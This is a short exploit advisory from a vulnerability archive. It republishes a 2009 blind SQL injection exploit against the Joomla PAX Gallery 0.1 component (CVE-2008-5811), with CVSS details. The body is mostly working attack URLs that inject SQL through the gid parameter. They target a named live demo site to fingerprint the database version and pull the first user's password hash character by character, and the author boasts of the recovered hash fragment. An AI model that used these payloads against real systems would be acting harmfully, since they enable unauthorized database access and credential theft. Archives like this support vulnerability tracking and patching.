Bug: Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability

Published
Credit
Risk
2009.01.06
XaDoS
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-5811
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

[] Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability

>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<


[&#65533;] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL]


[&#65533;] D&#163;M0:

>Version:

|:
http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@versio
n,1,1)=5 [Ye$]

|:
http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@versio
n,1,1)=4 [Noo]


|:
http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((s
elect%20password%20from%20jos_users%20limit%201,1),1,1))%3E100

d8e423..ecc... ;-)

[&#65533;] Th4nKs::

\> Str0ke </ \> Securitycode Team </ \> StaKer </

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version